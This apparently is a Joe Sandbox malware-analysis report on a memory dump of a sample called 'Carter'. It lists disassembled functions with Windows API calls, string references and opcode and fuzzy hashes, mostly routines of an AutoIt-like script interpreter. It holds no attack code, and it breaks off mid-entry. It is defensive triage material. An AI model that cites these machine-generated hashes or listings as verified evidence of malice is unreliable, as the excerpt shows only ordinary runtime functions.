Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 39dff1eb2217d1a51934a4815ac24ce75ed9b0c51dd3a169b9c25baf49feb445
Instruction ID: 797fd2379e5e4d357dfe5ebfbfee4cde9e86d5df8f39f7fb075d86258082c479
Opcode Fuzzy Hash: 39dff1eb2217d1a51934a4815ac24ce75ed9b0c51dd3a169b9c25baf49feb445
Instruction Fuzzy Hash: FF81B1710083069BDB04DF14C9C5FAAB7E8FF44318F148569FD998A096DB30EE49DBA1

Function 00C4B8B6 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00C4B915

Strings

HANDLE=, xrefs: 00C4B90E
[CLASS:, xrefs: 00C4B965
[ACTIVE, xrefs: 00C4B902
[ALL, xrefs: 00C4B9BB
[HANDLE:, xrefs: 00C4B921
REGEXP=, xrefs: 00C4B92A
LAST, xrefs: 00C4B8DA
[REGEXPTITLE:, xrefs: 00C4B93D
ALL, xrefs: 00C4B9A9
ACTIVE, xrefs: 00C4B8F0
[LAST, xrefs: 00C4B9C2
CLASSNAME=, xrefs: 00C4B952

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: ff6896be3ab0650a340cc355544894cc78cf905d57375aaf9efcd17fe079fbe1
Instruction ID: 40092b3c86dd997d7ae80de0ee530cb3a6f6a8b7ce34d89106f71655226ae2c8
Opcode Fuzzy Hash: ff6896be3ab0650a340cc355544894cc78cf905d57375aaf9efcd17fe079fbe1
Instruction Fuzzy Hash: 9F31C431A44206AADB14FB60CD43EFEB3B4AF22754F640135F951B10D2EF56AF04EA56

Function 00C4CB97 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00C4CBAA
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00C4CBBC
SetWindowTextW.USER32(?,?), ref: 00C4CBD3
GetDlgItem.USER32(?,000003EA), ref: 00C4CBE8
SetWindowTextW.USER32(00000000,?), ref: 00C4CBEE
GetDlgItem.USER32(?,000003E9), ref: 00C4CBFE
SetWindowTextW.USER32(00000000,?), ref: 00C4CC04
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00C4CC25
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00C4CC3F
GetWindowRect.USER32(?,?), ref: 00C4CC48
SetWindowTextW.USER32(?,?), ref: 00C4CCB3
GetDesktopWindow.USER32 ref: 00C4CCB9
GetWindowRect.USER32(00000000), ref: 00C4CCC0
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00C4CD0C
GetClientRect.USER32(?,?), ref: 00C4CD19
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00C4CD3E
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00C4CD69

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: f55338f983326e302da13fe9706140d32ba0094b767e06c6554958b423bb030c
Instruction ID: 05d889ac4aca9aed2ed3519c06c5a0d746b043ce8afc3319df71613e0cc467d6
Opcode Fuzzy Hash: f55338f983326e302da13fe9706140d32ba0094b767e06c6554958b423bb030c
Instruction Fuzzy Hash: 3E518B31900709EFDB609FA8CECAB6EBBF5FF04705F104928F596A25A0D774A918CB54

Function 00C7A7DE Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C7A87E
DestroyWindow.USER32(00000000,?), ref: 00C7A8F8

Part of subcall function 00C01821: _memmove.LIBCMT ref: 00C0185B

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00C7A972
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00C7A994
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C7A9A7
DestroyWindow.USER32(00000000), ref: 00C7A9C9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00BF0000,00000000), ref: 00C7AA00
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C7AA19
GetDesktopWindow.USER32 ref: 00C7AA32
GetWindowRect.USER32(00000000), ref: 00C7AA39
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C7AA51
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00C7AA69

Part of subcall function 00BF29AB: GetWindowLongW.USER32(?,000000EB), ref: 00BF29BC

Strings

tooltips_class32, xrefs: 00C7A96B, 00C7A9F9
0, xrefs: 00C7A894

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: b5b8e936921578552e59f3abe36651301183cc0979e54877f3c5bccc6aff4b82
Instruction ID: 936ebbf31ccdca83ceb67529a4416b90619f32d4dcffa4bcbb1a96d2a39c27ed
Opcode Fuzzy Hash: b5b8e936921578552e59f3abe36651301183cc0979e54877f3c5bccc6aff4b82
Instruction Fuzzy Hash: 5F719671140200AFD721CF28CC48F6B7BE9FBC8314F14862CF99A972A1D771AA15DB56

Function 00C7CCA6 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00BF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BF29F3

DragQueryPoint.SHELL32(?,?), ref: 00C7CCCF

Part of subcall function 00C7B1A9: ClientToScreen.USER32(?,?), ref: 00C7B1D2
Part of subcall function 00C7B1A9: GetWindowRect.USER32(?,?), ref: 00C7B248
Part of subcall function 00C7B1A9: PtInRect.USER32(?,?,00C7C6BC), ref: 00C7B258

SendMessageW.USER32(?,000000B0,?,?), ref: 00C7CD38
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00C7CD43
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00C7CD66
_wcscat.LIBCMT ref: 00C7CD96
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00C7CDAD
SendMessageW.USER32(?,000000B0,?,?), ref: 00C7CDC6
SendMessageW.USER32(?,000000B1,?,?), ref: 00C7CDDD
SendMessageW.USER32(?,000000B1,?,?), ref: 00C7CDFF
DragFinish.SHELL32(?), ref: 00C7CE06
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00C7CEF9

Strings

@GUI_DRAGID, xrefs: 00C7CE71
@GUI_DROPID, xrefs: 00C7CE26
@GUI_DRAGFILE, xrefs: 00C7CEA8

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 82303ba7f65f23a28f38ddfc25e8e22f863e4be8c9388b1778a7c641f091f3a6
Instruction ID: 56f48c6fda37ee01df4534694075e8e6798293654584648b7d4aff82b57a2be5
Opcode Fuzzy Hash: 82303ba7f65f23a28f38ddfc25e8e22f863e4be8c9388b1778a7c641f091f3a6
Instruction Fuzzy Hash: 00614771108301AFC711DF50DC85EAFBBE8EF99750F100A2DFA95931A1DB709A49CB62

Function 00C582D5 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00C5831A
VariantCopy.OLEAUT32(00000000,?), ref: 00C58323
VariantClear.OLEAUT32(00000000), ref: 00C5832F
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00C5841D
__swprintf.LIBCMT ref: 00C5844D
VarR8FromDec.OLEAUT32(?,?), ref: 00C58479
VariantInit.OLEAUT32(?), ref: 00C5852A
SysFreeString.OLEAUT32(?), ref: 00C585BE
VariantClear.OLEAUT32(?), ref: 00C58618
VariantClear.OLEAUT32(?), ref: 00C58627
VariantInit.OLEAUT32(00000000), ref: 00C58665

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00C58447
Default, xrefs: 00C584DA

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: 5aa9b8492bbca1794edf0f6e2b57d68e1947600cedcac021322d17f763565c5f
Instruction ID: 49006a0f89e70d30b6f74b6b5a39b4788e4cac13086d5e8076392385823e8d35
Opcode Fuzzy Hash: 5aa9b8492bbca1794edf0f6e2b57d68e1947600cedcac021322d17f763565c5f
Instruction Fuzzy Hash: 7AD1D039604115DBDB109FA2C885B6EB7B4BF05702F248195EC15AB1A1DF30DDCCEBA8

Function 00C749CF Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00C74A61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C74AAC

Strings

GETTOTALCOUNT, xrefs: 00C74A93
GETITEMCOUNT, xrefs: 00C74B8E
GETSELECTED, xrefs: 00C74BBC
EXISTS, xrefs: 00C74B15
GETTEXT, xrefs: 00C74BFF
UNCHECK, xrefs: 00C74C88
CHECK, xrefs: 00C74ACC
COLLAPSE, xrefs: 00C74AF2
EXPAND, xrefs: 00C74B5E
ISCHECKED, xrefs: 00C74C2F
SELECT, xrefs: 00C74C5D

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 29bd59bbc50c8f8a907cdc8b1bcb33cfc5fe5e6e8ed492dcb943a210fff02886
Instruction ID: 40706ccc5eeb4e5ab05df364272eb98a6762b9a50d00cf0f997dba479373cf2c
Opcode Fuzzy Hash: 29bd59bbc50c8f8a907cdc8b1bcb33cfc5fe5e6e8ed492dcb943a210fff02886
Instruction Fuzzy Hash: 13917E742047159BCB08EF20C451A7EB7E1BF95354F1488A8F99A5B3A2DB30ED49EB81

Function 00C5E25D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00C5E31F
SystemTimeToFileTime.KERNEL32(?,?), ref: 00C5E32F
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C5E33B
__wsplitpath.LIBCMT ref: 00C5E399
_wcscat.LIBCMT ref: 00C5E3B1
_wcscat.LIBCMT ref: 00C5E3C3
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C5E3D8
SetCurrentDirectoryW.KERNEL32(?), ref: 00C5E3EC
SetCurrentDirectoryW.KERNEL32(?), ref: 00C5E41E
SetCurrentDirectoryW.KERNEL32(?), ref: 00C5E43F
_wcscpy.LIBCMT ref: 00C5E44B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C5E48A

Strings

*.*, xrefs: 00C5E445

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 6584ca22f065f9d6588038fe45bdcd1c9718076abe2c903e336de70585f97472
Instruction ID: e6a12fd9bd6acdb655d4da235f0afe9996ae53024621345edde8488fd7f8aa49
Opcode Fuzzy Hash: 6584ca22f065f9d6588038fe45bdcd1c9718076abe2c903e336de70585f97472
Instruction Fuzzy Hash: 1F617A765042059FC714EF60C844AAFB3E8FF89310F04896EF999C7251DB35EA89CB96

Function 00C5A27B Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00C5A2C2

Part of subcall function 00C01A36: _memmove.LIBCMT ref: 00C01A77

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00C5A2E3
__swprintf.LIBCMT ref: 00C5A33C
__swprintf.LIBCMT ref: 00C5A355
_wprintf.LIBCMT ref: 00C5A3FC
_wprintf.LIBCMT ref: 00C5A41A

Strings

^ ERROR , xrefs: 00C5A391
"%s" (%d) : ==> %s:, xrefs: 00C5A415
Line %d (File "%s"):, xrefs: 00C5A336, 00C5A34F
"%s" (%d) : ==> %s:%s%s, xrefs: 00C5A3F7
Error: , xrefs: 00C5A3C4
Incorrect parameters to object property !, xrefs: 00C5A39E

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-3080491070
Opcode ID: ed80a433f0e66c00ffdbc0f6a68100938421d54962698837afe5632cb39eea8b
Instruction ID: a0fb944be4f16625ede8f0ec7fd883a806833ad3171af10e42f08f31897d464b
Opcode Fuzzy Hash: ed80a433f0e66c00ffdbc0f6a68100938421d54962698837afe5632cb39eea8b
Instruction Fuzzy Hash: 5251C17190010AAADF15EBE0CD46EEEF778AF14341F140265F905B20A2EB356F98EB61

Function 00C50065 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000002,?,00C3F8B8,00000001,0000138C,00000001,00000002,00000001,?,00C63FF9,00000002), ref: 00C5009A
LoadStringW.USER32(00000000,?,00C3F8B8,00000001), ref: 00C500A3

Part of subcall function 00C01A36: _memmove.LIBCMT ref: 00C01A77

GetModuleHandleW.KERNEL32(00000000,00CB7310,?,00000FFF,?,?,00C3F8B8,00000001,0000138C,00000001,00000002,00000001,?,00C63FF9,00000002,00000001), ref: 00C500C5
LoadStringW.USER32(00000000,?,00C3F8B8,00000001), ref: 00C500C8
__swprintf.LIBCMT ref: 00C50118
__swprintf.LIBCMT ref: 00C50129
_wprintf.LIBCMT ref: 00C501D2
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C501E9

Strings

Line %d:, xrefs: 00C50123
Line %d (File "%s"):, xrefs: 00C50112
Error: , xrefs: 00C501A0
%s (%d) : ==> %s: %s %s, xrefs: 00C501CD
^ ERROR, xrefs: 00C5017E

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: 4af803b40eb71eefe42f97d26e4773cb36bcf23d4b533b784ef92216a7da6cb0
Instruction ID: 9804703aaf7339322ce594ec7e32bd5ab54b1a6fb63c9be144be216094960f7b
Opcode Fuzzy Hash: 4af803b40eb71eefe42f97d26e4773cb36bcf23d4b533b784ef92216a7da6cb0
Instruction Fuzzy Hash: 4E416F72900119AACF15EBE0CD96EEEB778EF15341F240165F905B20D2EB316F48EB61

Function 00C5A995 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00BF4D37: __itow.LIBCMT ref: 00BF4D62
Part of subcall function 00BF4D37: __swprintf.LIBCMT ref: 00BF4DAC

CharLowerBuffW.USER32(?,?), ref: 00C5AA0E
GetDriveTypeW.KERNEL32 ref: 00C5AA5B
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C5AAA3
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C5AADA
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C5AB08

Part of subcall function 00C01821: _memmove.LIBCMT ref: 00C0185B

Strings

wait, xrefs: 00C5AAC5
type cdaudio alias cd wait, xrefs: 00C5AA86
open , xrefs: 00C5AA6A
close, xrefs: 00C5AA14
set cd door , xrefs: 00C5AAA9
closed, xrefs: 00C5AA22, 00C5AA2B
close cd wait, xrefs: 00C5AAF3
open, xrefs: 00C5AA35

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 54ff6c737b49d0c4ca695ed7cad5060538966ca6dcafbcdba307be15b11a4936
Instruction ID: 84508b34277f3c79c1d26521cc28af88666adcc7f3972e75a7248d9d136ea651
Opcode Fuzzy Hash: 54ff6c737b49d0c4ca695ed7cad5060538966ca6dcafbcdba307be15b11a4936
Instruction Fuzzy Hash: 14518CB52043059FC700EF11C88196AB3F4FF89358F148A6DF895972A2DB31EE49DB92

Function 00C5A832 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C5A852
__swprintf.LIBCMT ref: 00C5A874
CreateDirectoryW.KERNEL32(?,00000000), ref: 00C5A8B1
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00C5A8D6
_memset.LIBCMT ref: 00C5A8F5
_wcsncpy.LIBCMT ref: 00C5A931
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00C5A966
CloseHandle.KERNEL32(00000000), ref: 00C5A971
RemoveDirectoryW.KERNEL32(?), ref: 00C5A97A
CloseHandle.KERNEL32(00000000), ref: 00C5A984

Strings

\, xrefs: 00C5A88A
\??\%s, xrefs: 00C5A86E
:, xrefs: 00C5A895

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 273e5d433e3f8d0b00f743bc0c351f12b2eb8573b1bcf2fa68b341d6bf5ba966
Instruction ID: 01a3a5553564703b00feb8af83e1ffebf6de099fcd0c13ec54295b7ff85e9d3e
Opcode Fuzzy Hash: 273e5d433e3f8d0b00f743bc0c351f12b2eb8573b1bcf2fa68b341d6bf5ba966
Instruction Fuzzy Hash: 0931C37550021AABDB209FA1DC48FEF73BCEF89711F1041B6F918D21A0E77097888B29

Function 00C7C0A5 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00C7982C,?,?), ref: 00C7C0C8
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00C7982C,?,?,00000000,?), ref: 00C7C0DF
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00C7982C,?,?,00000000,?), ref: 00C7C0EA
CloseHandle.KERNEL32(00000000,?,?,?,?,00C7982C,?,?,00000000,?), ref: 00C7C0F7
GlobalLock.KERNEL32(00000000), ref: 00C7C100
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00C7982C,?,?,00000000,?), ref: 00C7C10F
GlobalUnlock.KERNEL32(00000000), ref: 00C7C118
CloseHandle.KERNEL32(00000000,?,?,?,?,00C7982C,?,?,00000000,?), ref: 00C7C11F
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00C7982C,?,?,00000000,?), ref: 00C7C130
OleLoadPicture.OLEAUT32(?,00000000,00000000,00C83C7C,?), ref: 00C7C149
GlobalFree.KERNEL32(00000000), ref: 00C7C159
GetObjectW.GDI32(00000000,00000018,?), ref: 00C7C17D
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00C7C1A8
DeleteObject.GDI32(00000000), ref: 00C7C1D0
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00C7C1E6

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 542c254aeb56bb4ac6248977e8a3ce515d7567c5792eafcbdef53ddf6ab7404e
Instruction ID: 20660e5a38d15f55b00d6bcbbdf6ce315f64825335f90e645bd28dfa013108b4
Opcode Fuzzy Hash: 542c254aeb56bb4ac6248977e8a3ce515d7567c5792eafcbdef53ddf6ab7404e
Instruction Fuzzy Hash: F1415B71500205EFCB619F65CC8CFAE7BB8EF89721F208058F919E7261D7309A44DB64

Function 00C7C854 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

